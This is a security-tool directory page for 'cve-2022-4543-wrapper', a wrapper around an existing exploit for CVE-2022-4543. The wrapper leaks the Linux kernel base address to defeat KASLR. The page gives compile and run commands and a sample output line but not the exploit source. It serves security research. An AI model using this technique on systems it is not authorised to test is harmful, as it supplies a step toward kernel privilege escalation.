Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2022-4543-wrapper | Kitploit
Tools/GitHubGitHub/sunichi/cve-2022-4543-wrapper
Vulnerability AnalysisExploitationInformation GatheringBinary Exploitation
GitHubsunichi/cve-2022-4543-wrapper

cve-2022-4543-wrapper

View Repository
312 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

cve-2022-4543-wrapper

Introduction

This is a wrapper of willsroot's CVE-2022-4543 exploit to help you judge and get kernel base address.

How to use

Compile

Base on your demand(Optional):

root@kitploit:~
gcc dekaslr.c --static -o dekaslr
g++ main.cpp --static -o main

For some OS, install static libc first.

De-KASLR

root@kitploit:~
./main
[*] Usage: ./binary dekaslr_path entry_SYSCALL_64_offset(in hex) max_loop
root@kitploit:~
$ ./main ./dekaslr 0x100000 200
ffffffffa2600000: 53/200

After running both program, it will give you the most frequent address base on your offset.

In practice, the real kernel base address will appear more than 1/4 in total tries. Recommend more than 100 tries.

References

  • https://www.willsroot.io/2022/12/entrybleed.html
  • https://access.redhat.com/security/cve/cve-2022-4543
Download Tool